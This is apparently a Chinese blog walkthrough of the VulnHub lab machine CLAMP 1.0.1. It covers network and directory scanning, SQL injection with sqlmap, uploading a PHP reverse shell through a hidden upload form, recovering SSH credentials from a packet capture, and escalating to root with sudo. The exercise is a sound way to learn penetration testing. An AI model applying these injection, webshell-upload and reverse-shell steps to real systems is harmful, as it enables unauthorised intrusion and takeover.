CLAMP 1.0.1靶机

信息收集:

复制代码
靶机地址:https://www.vulnhub.com/entry/clamp-101,320/

(1)ip扫描,net扫不到换仅主机就行了

复制代码
nmap 192.168.8.0/24 -sn | grep -B 2 '00:0C:29:48:66:90'

(2)端口扫描

复制代码
nmap 192.168.8.130 -p- -A -sV -Pn

(3)目录扫描

复制代码
dirb http://192.168.8.130

(4)访问80端口,f12查看源码,提示让我扫描更多

(5)使用dirsearch,换了几个大一些的字典,但是没扫出来,访问 /nt4stopc/,下面有一些问题,提示必须收集答案

(6)都是一些判断题,对与错对应1与0,最后结果为

复制代码
0110111001

(7)点击图中位置,发现存在参数,php语言,尝试注入

(8)and 1=1 --+ 显示正常

(9)and 1=2 --+ 显示异常

(10)是存在注入的,使用 sqlmap 跑一下

复制代码
python3 sqlmap.py -u "http://192.168.8.130/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch --dbs

库名:

tatil 下表名:

gereksiz 下得到一串值:

复制代码
hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf  folder upload.php

解码后得到:
uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas

(11)可能还是路径,拼接访问

复制代码
http://192.168.8.130/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/

(12)再拼接 upload.php

复制代码
http://192.168.8.130/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/upload.php

(13)文件上传,以md5提交,但是没有提交按钮,自己在前端给加一个

复制代码
<input type="submit">

getshell:

(1)kali 生成反弹 shell

复制代码
locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

vim php-reverse-shell.php

(2)上传该文件后,返回了文件路径,文件名为md5加密后的

复制代码
osas/2ad6bded962b884337eaeb921d7c2764.php

http://192.168.8.130/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/2ad6bded962b884337eaeb921d7c2764.php

(3)nc监听,访问文件,成功反弹shell

提权:

(1)使用 python 提升交互性

复制代码
python3 -c 'import pty;pty.spawn("/bin/bash")'

(2)在 /var/www/html 下发现 important.pcapng

(3)查看文件,发现内容

复制代码
email=mkelepce&message=Hello+there%2C+The+password+for+the+SSH+account+you+want+is%3A+mkelepce%3Amklpc-osas112.+If+you+encounter+a+problem%2C+just+mail+it.++Good+work

(4)url解码,得到以下数据

复制代码
email=mkelepce&message=Hello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it.  Good work

账号密码:
mkelepce:mklpc-osas112.

(5)ssh连接,连接成功

复制代码
ssh mkelepce@192.168.8.130
mklpc-osas112.

(6)查看当前权限

复制代码
sudo -l
mklpc-osas112.

(7)sudo su 提权成功

相关推荐
枷锁—sha29 分钟前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
liann1193 小时前
3.1_网络——基础
网络·安全·web安全·http·网络安全
ESBK20255 小时前
第四届移动互联网、云计算与信息安全国际会议(MICCIS 2026)二轮征稿启动,诚邀全球学者共赴学术盛宴
大数据·网络·物联网·网络安全·云计算·密码学·信息与通信
旺仔Sec5 小时前
一文带你看懂免费开源 WAF 天花板!雷池 (SafeLine) 部署与实战全解析
web安全·网络安全·开源·waf
七牛云行业应用6 小时前
Moltbook一夜崩盘:150万密钥泄露背后的架构“死穴”与重构实战
网络安全·postgresql·架构·高并发·七牛云
原来是你~呀~6 小时前
Strix:AI驱动的全自动安全测试平台,LinuxOS部署
网络安全·自动化渗透测试·strix
fendouweiqian6 小时前
AWS WAF(配合 CloudFront)基础防护配置:免费能做什么、要不要开日志、如何限制危险方法
网络安全·aws·cloudfront
乾元7 小时前
终端安全(EDR):用深度学习识别未知勒索软件
运维·人工智能·网络协议·安全·网络安全·自动化·安全架构
Whoami!7 小时前
⓫⁄₁₃ ⟦ OSCP ⬖ 研记 ⟧ Windows权限提升 ➱ 利用Windows计划任务提权
网络安全·信息安全·利用windows计划任务提权
虚构之人1 天前
二进制漏洞挖掘(WinAFL Fuzzing)Windows篇
汇编·网络安全·信息安全·系统安全